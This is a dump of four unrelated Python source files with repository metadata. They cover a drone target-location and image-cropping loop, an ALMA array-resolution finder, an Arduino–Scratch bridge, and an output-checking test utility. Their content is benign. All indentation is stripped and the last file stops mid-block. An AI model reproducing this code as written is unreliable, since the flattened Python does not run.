FlintHill/SUAS-Competition | SUASSystem/SUASSystem/image_processing.py | 1 | 3266 | from time import sleep
from PIL import Image
import os
import math
import random
from .utils import *
from UpdatedImageProcessing import *
from .settings import GCSSettings
from .converter_functions import inverse_haversine, get_mission_json
from .location import Location
"""
This file contains our image processing logic and utilizes our cropper function.
"""
def run_img_proc_process(logger_queue, location_log, targets_to_submit, interop_client_array):
while True:
if len(targets_to_submit) > 0:
target_characteristics = targets_to_submit.pop(0)
target_time = get_image_timestamp_from_metadata("static/imgs/" + target_characteristics["base_image_filename"])
closest_time_index = 0
least_time_difference = location_log[0]["epoch_time"]
for index in range(len(location_log)):
difference_in_times = target_time - location_log[index]["epoch_time"]
if abs(difference_in_times) <= least_time_difference:
closest_time_index = index
least_time_difference = difference_in_times
drone_gps_location = Location(location_log[closest_time_index]["latitude"], location_log[closest_time_index]["longitude"], location_log[closest_time_index]["altitude"])
image = Image.open("static/imgs/" + target_characteristics["base_image_filename"])
image_midpoint = (image.width / 2, image.height / 2)
target_midpoint = ((target_characteristics["target_top_left"][0] + target_characteristics["target_bottom_right"][0]) / 2, (target_characteristics["target_top_left"][1] + target_characteristics["target_bottom_right"][1]) / 2)
target_location = get_target_gps_location(image_midpoint, target_midpoint, drone_gps_location)
target_characteristics["latitude"] = target_location.get_lat()
target_characteristics["longitude"] = target_location.get_lon()
original_image_path = "static/all_imgs/" + target_characteristics["base_image_filename"]
cropped_target_path = "static/crops/" + str(len(os.listdir('static/crops'))) + ".jpg"
cropped_target_data_path = "static/crops/" + str(len(os.listdir('static/crops'))) + ".json"
crop_target(original_image_path, cropped_target_path, target_characteristics["target_top_left"], target_characteristics["target_bottom_right"])
save_json_data(cropped_target_data_path, target_characteristics)
# comment out these lines if testing w/o interop
if target_characteristics["type"] == "standard":
interop_client_array[0].post_manual_standard_target(target_characteristics, cropped_target_path)
elif target_characteristics["type"] == "emergent":
interop_client_array[0].post_manual_emergent_target(target_characteristics, cropped_target_path)
sleep(0.1)
def run_autonomous_img_proc_process(logger_queue, interop_client_array, img_proc_status, autonomous_targets_to_submit):
while True:
if len(autonomous_targets_to_submit) > 0:
target_info = autonomous_targets_to_submit.pop()
interop_client_array[0].post_autonomous_target(target_info)
sleep(0.5)
| mit | -1,299,459,855,585,969,200 | 56.298246 | 236 | 0.672994 | false |
itoledoc/gWTO2 | arrayResolution2p.py | 1 | 23318 | #!/usr/bin/python
"""
Script to return the Cycle 2 arrays for a given LAS, Angular Resolution
HISTORY:
2012.10.11:
- first shot
- Cycle 1 setup
2012.11.20:
- Adding resolution, LAS for different declination
2012.12.27:
- adding a filter if no configuration is found to multiply by a fudge factor
2013.03.04:
- Adding geometric average for the spatial resolution and test on twice the spatial resolution
2013.03.05:
- fixing bugs
- adding extra information (THB, array)
2013.03.11:
- Removing the condition about AR/2. for the array.
2013.03.18:
- Adding point source option
- putting the AR/2. if it is not a point source
2013.03.20:
- changing the PS option to LAS = 0
2013.05.02:
- changing slightly the conditions of acceptance (>= instead of >)
2013.05.03:
- print version
- try increasing fudge factor until it gets a solution
2013.05.10:
- Add silentRun for P2G (FG)
2013.12.13:
- Name change for Cycle2 and update of the pickle.
- Update of the finder (multi-configuration)
2013.12.16:
- new find_array3 for the multi-configuration
2014.01.28:
- fix the fudge relaxation for the resolution.
2014.05.22:
- New algorithm to deal with minAr, maxAr
2014.05.22:
- ugly fixConfiguration when OT forces for two configurations
2014.06.02
- fixing the matchAR
- relaxing the condition to allow a better AR with a sufficient LAS (0.9)
2014.06.05:
- adapting the case 7-m+12-m
2014.06.13:
- fix an edge problem when LAS = 0
RUN:
Input RES (arcsec) LAS (arcsec) FREQ (GHz) Declination (Degree) Y/N (ACA)
> python arrayResolution2.py 0.2 2.5 640. -53 Y PS
"""
__author__ = "ALMA : SL, AL, FG"
__version__ = "[email protected]"
import sys, pickle, os
import math
### ALMA
LATITUDE_ALMA = -23.03
DEG2RAD = math.pi/180.
class arrayRes:
def __init__(self, arguments):
self.LAS = [26.1,26.3,18.0,18.0,14.4,9.1,9.1]
self.LASA = [44.0,44.0,44.0,44.0,14.4,9.1,9.1]
self.LAST = [390.0,390.0,390.0,390.0,14.4,9.,9.1]
self.res = [3.73,2.04,1.40,1.11,0.75,0.57,0.41]
self.frequencyReference = 100.
self.lasObs = 0.
self.resObs = 0.
self.resObsOriginal = 0
self.lasOriginal = 0
self.freqObs = 0.
self.pointSource = False
self.silent = True
self.nof12m = 1
self.minAR = [0.,10000.]
self.maxAR = [0, 0.]
self.args = arguments
self.array = {0:"C34-1",1:"C34-2",2:"C34-3",3:"C34-4",4:"C34-5",5:"C34-6",6:"C34-7"}
self.read_cycle2()
def set_las(self,las):
"Set the LAS of the observation"
self.lasObs = las
self.lasOriginal = las
def set_res(self,res):
"Set the angular resolution of the observation"
self.resObs = res
self.resOriginal = res
def set_frequency(self,freq):
"Set the frequency of the observation"
# if ((freq>=64.)&(freq<=116.)): freq = 100.
# if ((freq>=211.)&(freq<=275.)): freq = 230.
# if ((freq>=275.)&(freq<=373.)): freq = 345.
# if ((freq>=602.)&(freq<=720.)): freq = 675.
self.freqObs = freq
def set_declination(self,declination):
"Set the representative declination of the observation"
self.declination = declination
def set_aca(self,aca):
"Set the frequency of the observation"
self.acaUse = aca
def set_12m(self,numberof12m):
"Set the number of 12m array configuration"
self.nof12m = numberof12m
def set_pointSource(self, isPS):
"Set True if point source"
self.pointSource = isPS
def read_cycle2(self, directory=None):
directory = os.environ['WTO'] + 'conf/'
self.data = []
f = open(directory+'Resolution-C34-1.pickle')
self.data.append(pickle.load(f))
f.close()
f = open(directory+'Resolution-C34-2.pickle')
self.data.append(pickle.load(f))
f.close()
f = open(directory+'Resolution-C34-3.pickle')
self.data.append(pickle.load(f))
f.close()
f = open(directory+'Resolution-C34-4.pickle')
self.data.append(pickle.load(f))
f.close()
f = open(directory+'Resolution-C34-5.pickle')
self.data.append(pickle.load(f))
f.close()
f = open(directory+'Resolution-C34-6.pickle')
self.data.append(pickle.load(f))
f.close()
f = open(directory+'Resolution-C34-7.pickle')
self.data.append(pickle.load(f))
f.close()
### ACA ####
f = open(directory+'Resolution-ACA-std.pickle')
self.aca = pickle.load(f)
f.close()
def find_array(self):
"Find the array with the obs. input"
TP='N'
arrayMatch = []
scalingFrequency = self.frequencyReference / self.freqObs
if (self.acaUse == 'Y'):
self.LAS=self.LAST
if self.lasObs / scalingFrequency > self.LASA[1]:
TP='Y'
for arr in self.array :
if self.silent:
print self.LAS[arr] * scalingFrequency, self.res[arr] * scalingFrequency
if self.LAS[arr] * scalingFrequency >= self.lasObs and self.res[arr] * scalingFrequency <= self.resObs:
arrayMatch.append(self.array[arr])
else:
arrayMatch.append("")
return arrayMatch,TP
def find_array2(self,verbose = False):
"Find the array with the obs. input using the precise resolution, LAS..."
TP = 'N'
scalingFrequency = self.frequencyReference / self.freqObs
nData = len(self.data[0][0])
decMin = self.data[0][0][0]
decMax = self.data[0][0][nData-1]
deltaDec = (decMax-decMin)/nData
index = int(math.floor(((self.declination-decMin) / deltaDec)))
# print index
### No ACA
arrayMatch = []
for arr in self.array :
lasArr = self.data[arr][3][index]
resArr = math.sqrt(self.data[arr][1][index] * self.data[arr][2][index])
lasFreqArr = lasArr * scalingFrequency
spatialResolutionArr = resArr * scalingFrequency
res_thb = self.res[arr]*scalingFrequency
las_thb = self.LAS[arr]*scalingFrequency
elevation_factor = abs(1./math.sin(DEG2RAD*(90.-LATITUDE_ALMA+self.declination)))
res_estimated = math.sqrt(res_thb*res_thb*elevation_factor)
las_estimated = math.sqrt(las_thb*las_thb*elevation_factor)
if self.silent:
if(verbose):
print("# Array: %s, LAS: %5.2f, RES: %5.2f"%(self.array[arr],lasFreqArr, spatialResolutionArr ))
print("# THB: LAS: %5.2f, RES: %5.2f")%(las_estimated,res_estimated)
# print("#")
if self.pointSource:
if lasFreqArr >= self.lasObs and self.resObs >= spatialResolutionArr :
arrayMatch.append(self.array[arr])
else:
arrayMatch.append("")
else :
if lasFreqArr >= self.lasObs and self.resObs >= spatialResolutionArr and spatialResolutionArr >= self.resObs / 2. :
arrayMatch.append(self.array[arr])
else:
arrayMatch.append("")
### ACA used
if (self.acaUse == 'Y'):
arrayMatch = []
for arr in self.array:
resArr = math.sqrt(self.data[arr][1][index] * self.data[arr][2][index])
spatialResolutionArr = resArr*scalingFrequency
##
if self.pointSource:
if self.resObs > spatialResolutionArr and arr < 4:
arrayMatch.append(self.array[arr])
else:
arrayMatch.append("")
else :
if self.resObs >= spatialResolutionArr and spatialResolutionArr >= self.resObs / 2. and arr < 4:
arrayMatch.append(self.array[arr])
else:
arrayMatch.append("")
lasACA = self.aca[3][index]
if lasACA*scalingFrequency <= self.lasObs:
TP = 'Y'
return arrayMatch, TP
def find_array3(self,verbose = False):
"Find the array with the obs. input using the precise resolution, LAS.... It takes into account a multi-configuration"
TP = 'N'
scalingFrequency = self.frequencyReference / self.freqObs
nData = len(self.data[0][0])
decMin = self.data[0][0][0]
decMax = self.data[0][0][nData-1]
deltaDec = (decMax-decMin)/nData
index = int(math.floor(((self.declination-decMin) / deltaDec)))
# Cycle 2 Match Array
matchArrayCycle2 = {3:0,4:1,5:2,6:2}
###
arrayMatchRes = []
arrayMatchLAS = []
lasFreqArrAll = []
resFreqArrAll = []
for arr in self.array :
arrayMatchRes.append("")
arrayMatchLAS.append("")
lasArr = self.data[arr][3][index]
resArr = math.sqrt(self.data[arr][1][index] * self.data[arr][2][index])
lasFreqArr = lasArr * scalingFrequency
spatialResolutionArr = resArr * scalingFrequency
lasFreqArrAll.append(lasFreqArr)
resFreqArrAll.append(spatialResolutionArr)
res_thb = self.res[arr]*scalingFrequency
las_thb = self.LAS[arr]*scalingFrequency
elevation_factor = abs(1./ math.sin(DEG2RAD*(90.-LATITUDE_ALMA+self.declination)))
res_estimated = math.sqrt(res_thb*res_thb*elevation_factor)
las_estimated = math.sqrt(las_thb*las_thb*elevation_factor)
if self.silent:
if(verbose):
print("# Array: %s, LAS: %5.2f, RES: %5.2f"%(self.array[arr],lasFreqArr, spatialResolutionArr ))
print("# THB: LAS: %5.2f, RES: %5.2f")%(las_estimated,res_estimated)
# print("#")
########################### Comparison #######################
notFound = True
notFoundLAS = True
for arr in self.array :
lasFreqArr = lasFreqArrAll[arr]
spatialResolutionArr = resFreqArrAll[arr]
if self.pointSource:
if self.resObs >= spatialResolutionArr :
arrayMatchRes[arr] = self.array[arr]
notFound = False
else :
if self.resObs >= spatialResolutionArr and spatialResolutionArr >= self.resObs / 2. :
arrayMatchRes[arr] = self.array[arr]
notFound = False
if lasFreqArr <= self.lasObs and arr > 2:
arrayMatchLAS[matchArrayCycle2[arr]] = self.array[matchArrayCycle2[arr]]
if lasFreqArrAll[matchArrayCycle2[arr]] <= self.lasObs and matchArrayCycle2[arr] > 0:
for i in range(0,matchArrayCycle2[arr]):
if lasFreqArrAll[i] >= self.lasObs :
arrayMatchLAS[i] = self.array[i]
notFoundLAS = False
### ACA used ###############
if (self.acaUse == 'Y'):
arrayMatchRes = []
arrayMatchLAS = []
for arr in self.array :
arrayMatchRes.append("")
arrayMatchLAS.append("")
for arr in self.array:
spatialResolutionArr = resFreqArrAll[arr]
if self.resObs >= spatialResolutionArr and spatialResolutionArr >= self.resObs / 2. :
arrayMatchRes[arr] = self.array[arr]
notFound = False
if arr > 2:
arrayMatchLAS[matchArrayCycle2[arr]] = self.array[matchArrayCycle2[arr]]
lasACA = self.aca[3][index]
if lasACA*scalingFrequency <= self.lasObs:
TP = 'Y'
return [arrayMatchRes,arrayMatchLAS] , TP , notFound, notFoundLAS
def matchAR(self,resLas):
"Match the spatial resolution for the number of configurations"
scalingFrequency = self.frequencyReference / self.freqObs
nData = len(self.data[0][0])
decMin = self.data[0][0][0]
decMax = self.data[0][0][nData-1]
deltaDec = (decMax-decMin)/nData
zenith = int(math.floor(((-23.0-decMin) / deltaDec)))
## check if the resolution is lower than the most compact one
##
b0_12compact = self.data[0][1][zenith] * scalingFrequency
b1_12compact = self.data[0][2][zenith] * scalingFrequency
resCompact = math.sqrt(b0_12compact*b1_12compact)
maxArrayCycle2 = 6
b0_12ext = self.data[maxArrayCycle2][1][zenith] * scalingFrequency
b1_12ext = self.data[maxArrayCycle2][2][zenith] * scalingFrequency
resExt = math.sqrt(b0_12ext*b1_12ext)
########
#print resCompact
#print resExt
if self.nof12m == 1:
self.maxAR[0] = self.resOriginal * 1.1
self.minAR[0] = self.resOriginal * 0.7
## We relax the condition to get at least 0.9 LAS
for arr in self.array:
lasArr = self.data[arr][3][zenith] *scalingFrequency
b0 = self.data[arr][1][zenith] * scalingFrequency
b1 = self.data[arr][2][zenith] * scalingFrequency
res = math.sqrt(b0*b1)
if lasArr > 0.9 * self.lasObs and res < self.minAR[0] :
# print res
self.minAR[0] = res
if self.resOriginal > resCompact and self.lasObs != 0.:
self.minAR[0] = resCompact * 0.8
self.maxAR[0] = self.resOriginal * 1.1
if self.resOriginal < resExt:
self.minAR[0] = self.resOriginal
self.maxAR[0] = resExt * 1.1
if self.nof12m == 2:
## estimate the array 1
self.minAR[0] = self.resOriginal * 0.7
self.maxAR[0] = self.resOriginal * 1.1
minArr = 1000
maxArr = 0
for s in resLas:
for arr in self.array:
if s == self.array[arr]:
if arr < minArr:
minArr = arr
if arr > maxArr:
maxArr = arr
b0 = self.data[arr][1][zenith] * scalingFrequency
b1 = self.data[arr][2][zenith] * scalingFrequency
res = math.sqrt(b0*b1)
if res > self.maxAR[1]:
self.maxAR[1] = res
if res < self.minAR[1]:
self.minAR[1] = res
if minArr > 0:
b0 = self.data[minArr-1][1][zenith] * scalingFrequency
b1 = self.data[minArr-1][2][zenith] * scalingFrequency
res = math.sqrt(b0*b1) * 0.9
self.maxAR[1] = res
if self.maxAR[1] == self.minAR[1]:
b0 = self.data[maxArr+1][1][zenith] * scalingFrequency
b1 = self.data[maxArr+1][2][zenith] * scalingFrequency
res = math.sqrt(b0*b1) * 1.3
self.minAR[1] = res
## check on the highest spatial resolution
if self.resOriginal < resExt:
self.minAR[0] = self.resOriginal * 0.7
self.maxAR[0] = resExt * 1.1
def fixConfiguration(self,result,nof12m):
" Fix the configurations"
lasC = []
extC = []
ext = 0
las = 0
for s in result[0]:
if s != '':
ext += 1
extC.append(s)
for s in result[1]:
if s != '':
las += 1
lasC.append(s)
if nof12m == 2 and las == 0 :
if extC[-1] == 'C34-7' :
resN = ['C34-6']
elif extC[-1] == 'C34-6':
resN = ['C34-5']
elif extC[-1] == 'C34-5' :
resN = ['C34-4']
elif extC[-1] == 'C34-4' :
resN = ['C34-3']
elif extC[-1] == 'C34-3' :
resN = ['C34-2']
elif extC[-1] == 'C34-2' :
resN = ['C34-1']
result[1]= resN
return(result)
########################################################################3
def silentRun(self):
self.silent = False
def run(self):
"Run the matching array"
TP="N"
self.set_res(float(self.args[1]))
self.set_las(float(self.args[2]))
self.set_frequency(float(self.args[3]))
self.set_declination(float(-23.0))
self.set_aca((self.args[4]))
self.set_12m(int(self.args[5]))
if self.lasObs == 0.:
self.set_pointSource(True)
strOut = "### arrayResolution2p \n"
strOut += "### Version: %s \n"%(__version__)
strOut += "### Input \n"
if self.pointSource:
strOut += "# Point Source ! \n"
strOut += "# Spatial Resolution: %s \n"%(self.args[1])
strOut += "# LAS: %s \n"%(self.args[2])
strOut += "# Frequency: %s GHz \n"%(self.args[3])
# strOut += "# Declination: %s \n"%(self.args[4])
strOut += "# 7-m Array (Y/N): %s \n"%(self.args[4])
strOut += "# Num. of 12-m Array: %d \n\n"%(self.nof12m)
strOut += "### Output (target frequency) \n"
strOut += "### Using CASA simulation with natural weighting (slightly different of THB)"
if self.silent:
print(strOut)
notFound = True
maxTry = 100
nTry = 1
deltaFudgeFactor = 0.05
fudgeFactor = 1.0
res , TP , notFound , notFoundLAS = self.find_array3(verbose = True)
while (notFound and nTry < maxTry and notFoundLAS and self.acaUse == 'N' ):
nTry += 1
notFound = False
fudgeFactor += deltaFudgeFactor
self.resObs *= fudgeFactor
self.lasObs /= fudgeFactor
res , TP , notFound , notFoundLAS = self.find_array3()
while (notFound and nTry < maxTry ):
nTry += 1
notFound = False
fudgeFactor += deltaFudgeFactor
self.resObs *= fudgeFactor
res , TP , notFound , notFoundLAS = self.find_array3()
if nTry > 1 :
if self.silent:
print("# No array configuration found, fudge factor applied (Tol = %3.0f %%)"%((fudgeFactor-1.)*100.))
if notFound and nTry > 1:
if self.silent:
print("# No array configuration found, even with fudge factor, problem ...")
strOutRes = ""
strOutLAS = ""
pcomR = ""
pcomL = ""
if self.silent:
print ""
print("### Results - AR - LAS")
if notFound :
if self.silent:
print ",,,,,"
else:
for s in res[0]:
strOutRes += pcomR+s
pcomR = ","
strOutRes += ","
strOutRes += TP
for s in res[1]:
strOutLAS += pcomL+s
pcomL = ","
strOutLAS += ","
strOutLAS += TP
# if self.silent:
# print strOutLAS
# print strOutRes
# print res
resN = self.fixConfiguration(res, self.nof12m)
# print resN
self.matchAR(resN[1])
if self.nof12m == 1:
#print("One Array:")
#print("Min Resolution : %5.2f "%(self.minAR[0]))
#print("Max Resolution : %5.2f "%(self.maxAR[0]))
return self.minAR[0], self.maxAR[0], 0, 0
elif self.nof12m == 2:
#print("Extended Array:")
#print("Min Resolution minAR_e %5.2f "%(self.minAR[0]))
#print("Max Resolution maxAR_e %5.2f "%(self.maxAR[0]))
#print("Compact Array:")
#print("Min Resolution minAR_c %5.2f "%(self.minAR[1]))
#print("Max Resolution maxAR_c %5.2f "%(self.maxAR[1]))
return self.minAR[0], self.maxAR[0], self.minAR[1], self.maxAR[1]
#====== Standalone program =========================
if __name__=="__main__":
arg = sys.argv
if len(arg) < 6:
print "Arguments missing \n"
print "The correct syntax is:"
print "python arrayResolution2p.py RES (arcsec) LAS (arcsec) FREQ (GHz) Y/N (ACA) numberofarray \n"
print "Example:"
print "python arrayResolution2p.py 0.2 2.0 640. Y 1 ## if LAS = 0. assumes a point source"
else :
a = arrayRes(arg)
a.run()
| gpl-2.0 | -7,200,967,021,325,123,000 | 30.173797 | 133 | 0.46908 | false |
Sayter99/86Scratch | Helpers/86Scratch/s2a_fm.py | 1 | 4575 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Created on Wed Nov 25 13:17:15 2013
@author: Alan Yorinks
Copyright (c) 2013-14 Alan Yorinks All right reserved.
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import sys
from PyMata.pymata import PyMata
import scratch_http_server
from scratch_command_handlers import ScratchCommandHandlers
import time
#noinspection PyBroadException
def s2a_fm():
"""
This is the "main" function of the program.
It will instantiate PyMata for communication with an Arduino micro-controller
and the command handlers class.
It will the start the HTTP server to communicate with Scratch 2.0
@return : This is the main loop and should never return
"""
# total number of pins on arduino board
total_pins_discovered = 0
# number of pins that are analog
number_of_analog_pins_discovered = 0
print 's2a_fm version 1.5 Copyright(C) 2013-14 Alan Yorinks All Rights Reserved '
# get the com_port from the command line or default if none given
# if user specified the com port on the command line, use that when invoking PyMata,
# else use '/dev/ttyACM0'
if len(sys.argv) == 2:
com_port = str(sys.argv[1])
else:
com_port = '/dev/ttyACM0'
try:
# instantiate PyMata
firmata = PyMata(com_port) # pragma: no cover
except Exception:
print 'Could not instantiate PyMata - is your Arduino plugged in?'
return
# determine the total number of pins and the number of analog pins for the Arduino
# get the arduino analog pin map
# it will contain an entry for all the pins with non-analog set to firmata.IGNORE
firmata.analog_mapping_query()
capability_map = firmata.get_analog_mapping_request_results()
firmata.capability_query()
print "Please wait for Total Arduino Pin Discovery to complete. This can take up to 30 additional seconds."
# count the pins
for pin in capability_map:
total_pins_discovered += 1
# non analog pins will be marked as IGNORE
if pin != firmata.IGNORE:
number_of_analog_pins_discovered += 1
# instantiate the command handler
scratch_command_handler = ScratchCommandHandlers(firmata, com_port, total_pins_discovered,
number_of_analog_pins_discovered)
# wait for a maximum of 30 seconds to retrieve the Arduino capability query
start_time = time.time()
pin_capability = firmata.get_capability_query_results()
while not pin_capability:
if time.time() - start_time > 30:
print ''
print "Could not determine pin capability - exiting."
firmata.close()
# keep sending out a capability query until there is a response
pin_capability = firmata.get_capability_query_results()
time.sleep(.1)
# we've got the capability, now build a dictionary with pin as the key and a list of all the capabilities
# for the pin as the key's value
pin_list = []
total_pins_discovered = 0
for entry in pin_capability:
# bump up pin counter each time IGNORE is found
if entry == firmata.IGNORE:
scratch_command_handler.pin_map[total_pins_discovered] = pin_list
total_pins_discovered += 1
pin_list = []
else:
pin_list.append(entry)
print "Arduino Total Pin Discovery completed in %d seconds" % (int(time.time() - start_time))
try:
# start the server passing it the handle to PyMata and the command handler.
scratch_http_server.start_server(firmata, scratch_command_handler)
except Exception:
firmata.close()
return
except KeyboardInterrupt:
# give control back to the shell that started us
firmata.close()
return
if __name__ == "__main__":
s2a_fm() | mit | -6,333,871,453,249,498,000 | 34.75 | 111 | 0.676066 | false |
alalek/cmake_utils | tests/checkoutput.py | 1 | 12432 | #!/bin/env python3
import os
import string
import sys
import re
from pprint import pprint
class CheckException(Exception):
pass
CHECK_SIMPLE = ''
CHECK_NEXT = '-NEXT'
CHECK_SAME = '-SAME'
CHECK_NOT = '-NOT'
CHECK_BETWEEN = '-BETWEEN' # check without order
CHECK_LABEL = 'LABEL'
def _apply_check(c, m, variables, nline):
c['found'] = True
c['nline'] = nline
variables.update(m.groupdict())
_var_entry_re = re.compile(r'(?P<name>[A-Za-z0-9_]+)(:(?P<regexp>.+))?')
def _build_pattern(content, variables):
pattern = ''
pos = 0
while pos < len(content):
re_start = string.find(content, '{{', pos)
var_start = string.find(content, '[[', pos)
if re_start != -1 and var_start != -1:
if re_start < var_start:
var_start = -1
else:
re_start = -1
if re_start != -1:
re_end = string.find(content, '}}', re_start)
assert re_end != -1, "Invalid {{...}} entry"
pattern += re.escape(content[pos:re_start])
pattern += content[re_start+2:re_end]
pos = re_end + 2
elif var_start != -1:
var_end = string.find(content, ']]', var_start)
assert var_end != -1, "Invalid [[...]] entry"
pattern += re.escape(content[pos:var_start])
var_entry = content[var_start+2:var_end]
m = _var_entry_re.match(var_entry)
assert m
name = m.group('name')
regexp = m.group('regexp')
if regexp is None:
assert name in variables, 'Variable "%s" is not found' % name
v = variables[name]
pattern += re.escape(v)
else:
pattern += r'(?P<' + name + r'>' + regexp + ')'
pos = var_end + 2
else:
pattern += re.escape(content[pos:])
break
pattern = r'(^| |\t)' + pattern + r'($| |\t)'
return pattern
class Checker():
''' Output check prefix '''
prefix = 'CHECK'
def __init__(self, prefix=None, file=None, lines=None):
if prefix is not None:
self.prefix = prefix
self._build_regexp()
if file is not None:
assert isinstance(file, str)
self.build_from_file(file)
if lines is not None:
self.build_from_lines(lines)
def _build_regexp(self):
assert isinstance(self.prefix, str)
self.check_re = re.compile(
r'^[^A-Za-z0-9]*' + re.escape(self.prefix) +
'(?P<type>(|-NEXT|-SAME|-NOT|-BETWEEN|-LABEL)): ?(?P<content>.*)$'
)
def build_from_file(self, filePath):
if not os.path.exists(filePath):
raise Exception("Can't find file: " + filePath)
raw_checks = []
with open(filePath, "rb") as f:
for line in f:
if isinstance(line, bytes):
line = line.decode('utf-8')
if len(line) > 0 and line[-1] == '\r':
line = line[:-1]
if len(line) > 0 and line[-1] == '\n':
line = line[:-1]
if len(line) == 0:
continue
m = self.check_re.match(line)
if m:
raw_checks.append(dict(type=m.group('type'), content=m.group('content')))
self._compile(raw_checks)
def build_from_lines(self, lines):
raw_checks = []
for line in lines:
if isinstance(line, bytes):
line = line.decode('utf-8')
if len(line) > 0 and line[-1] == '\r':
line = line[:-1]
if len(line) > 0 and line[-1] == '\n':
line = line[:-1]
if len(line) == 0:
continue
m = self.check_re.match(line)
if m:
raw_checks.append(dict(type=m.group('type'), content=m.group('content')))
self._compile(raw_checks)
checks_list = None # list of separated check blocks
nrules = 0
def _compile(self, raw_checks):
if self.checks_list is None:
self.checks_list = []
current_check_sequence = []
current_label = None
for c in raw_checks:
self.nrules += 1
type = c['type']
if type == CHECK_SIMPLE:
pass
elif type == CHECK_NEXT:
assert len(current_check_sequence) > 0, "Invalid usage of NEXT check"
elif type == CHECK_SAME:
assert len(current_check_sequence) > 0, "Invalid usage of SAME check"
elif type == CHECK_NOT:
pass
elif type == CHECK_BETWEEN:
pass
elif type == CHECK_LABEL:
if len(current_check_sequence) > 0:
self.checks_list.append(dict(label=current_label, sequence=current_check_sequence))
current_check_sequence = []
current_label = content.strip()
if len(current_label) == 0:
currennt_label = None
continue
else:
assert False, 'Invalid check type: ' + type
current_check_sequence.append(dict(content=c['content'], type=type))
if len(current_check_sequence) > 0:
self.checks_list.append(dict(label=current_label, sequence=current_check_sequence))
def _validate(self, lines, check_sequence):
variables = {}
def found(c, m, nline):
return _apply_check(c, m, variables, nline)
def get_regexp(content):
return re.compile(_build_pattern(content, variables))
nline = -1
nline_prev = -1
not_check = None
between_checks = []
for c in check_sequence:
if c['type'] == CHECK_SIMPLE:
nline += 1
while nline < len(lines):
m = get_regexp(c['content']).search(lines[nline])
if m is not None:
found(c, m, nline)
break
nline += 1
else:
raise CheckException("Failed check: " + c['content'])
elif c['type'] == CHECK_NEXT:
nline += 1
if not nline < len(lines):
raise CheckException("EOF for NEXT check: " + c['content'])
m = get_regexp(c['content']).search(lines[nline])
if m is not None:
found(c, m, nline)
else:
raise CheckException("Failed NEXT check: " + c['content'] + '\n\tline: ' + lines[nline])
elif c['type'] == CHECK_SAME:
m = get_regexp(c['content']).search(lines[nline])
if m is not None:
found(c, m, nline)
else:
raise CheckException("Failed SAME check: " + c['content'] + '\n\tline: ' + lines[nline])
elif c['type'] == CHECK_NOT:
assert len(between_checks) == 0, "Invalid mix of NOT and BETWEEN checks: " + c['content']
not_check = c
continue
elif c['type'] == CHECK_BETWEEN:
assert not_check is None, "Invalid mix of NOT and BETWEEN checks: " + c['content']
between_checks.append(c)
continue
else:
assert False, "Internal error"
if not_check is not None:
lastline = nline
if c['type'] == CHECK_SAME:
lastline = nline + 1
for nl in range(nline_prev, lastline):
m = get_regexp(not_check['content']).search(lines[nl])
if m is not None:
raise CheckException("Failed NOT check: " + not_check['content'] + '\n\tline: ' + lines[nline])
not_check = None
if len(between_checks) > 0:
regexp = []
for c in between_checks:
regexp.append(get_regexp(c['content']))
nfound = 0
for nl in range(nline_prev, nline):
for i, r in enumerate(regexp):
m = r.search(lines[nl])
if m is not None:
found(between_checks[i], m, nl)
nfound += 1
break
if nfound != len(between_checks):
failed = []
for c in between_checks:
if 'found' not in c:
failed.append(c['content'])
raise CheckException("Failed BETWEEN checks:\n\t" + failed.join('\n\t'))
between_checks = []
nline_prev = nline
def validate(self, lines):
filtered_lines = [] # ignore lines with CHECK directives
for line in lines:
if isinstance(line, bytes):
line = line.decode('utf-8')
if len(line) > 0 and line[-1] == '\r':
line = line[:-1]
if len(line) > 0 and line[-1] == '\n':
line = line[:-1]
if len(line) == 0:
continue
m = self.check_re.match(line)
if m is None:
filtered_lines.append(line)
errors = 0
for check_sequence in self.checks_list:
try:
self._validate(filtered_lines, check_sequence['sequence'])
except CheckException, e:
msg = '[%s] %s' % (check_sequence['label'] or '-', e.args[0])
print(msg)
errors += 1
return errors
def __str__(self):
return 'checks %d, rules %d' % (len(self.checks_list), self.nrules)
def read_lines(file):
lines = []
for line in file:
if isinstance(line, bytes):
line = line.decode('utf-8')
if len(line) > 0 and line[-1] == '\r':
line = line[:-1]
if len(line) > 0 and line[-1] == '\n':
line = line[:-1]
lines.append(line)
return lines
def _test():
lines = '''
; CHECK: foo
; CHECK-NEXT: foo3
foo3
foo
foo3
// CHECK: bar1
// CHECK-SAME: baz
bar1 baz
# CHECK: bar2
# CHECK-NOT: foo
# CHECK-SAME: baz
bar2 baz
// CHECK: foo
// CHECK-BETWEEN: e1
// CHECK-BETWEEN: e2
// CHECK-BETWEEN: e3
// CHECK: end
foo
e2
q
e1
q
e3
q
end
'''.split('\n')
c = Checker(lines=lines)
errors1 = c.validate(lines)
print('errors1: %d' % errors1)
lines = '''
; CHECK: foo{{.+}}
foo3
; CHECK: foo[[ID:[0-9]+]]
; CHECK-NEXT: bar[[ID]]
foo3
bar3
'''.split('\n')
c = Checker(lines=lines)
errors2 = c.validate(lines)
print('errors2: %d' % errors2)
if errors1 + errors2 == 0:
print('OK')
return 0
else:
print('FAILED')
return 1
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(
description='Testsuite utility to verify output produced via stdin or separate file')
parser.add_argument('--version', action='version', version='checkoutput 0.0')
parser.add_argument('--verbose', '-v', action='count')
parser.add_argument('-c', '--check_file', required=False,
help='file with rules to check (defaults to input file)')
parser.add_argument('-i', '--input_file', metavar='filename',
help='input file to check (defaults to stdin)')
parser.add_argument('--prefix', metavar='prefix', default='CHECK',
help='prefix for check pattern')
parser.add_argument('--test', action='store_true', help='run self test')
args = parser.parse_args()
if args.test:
sys.exit(_test())
c = Checker(prefix=args.prefix)
if args.input_file:
with open(args.input_file, 'rb') as f:
verify_lines = read_lines(f)
else:
verify_lines = read_lines(sys.stdin)
if args.check_file:
c.build_from_file(args.check_file)
else:
c.build_from_lines(verify_lines)
if c.nrules == 0:
sys.exit("Check rules is empty")
if len(verify_lines) == 0:
sys.exit("Input is empty")
errors = c.validate(verify_lines)
if errors > 0:
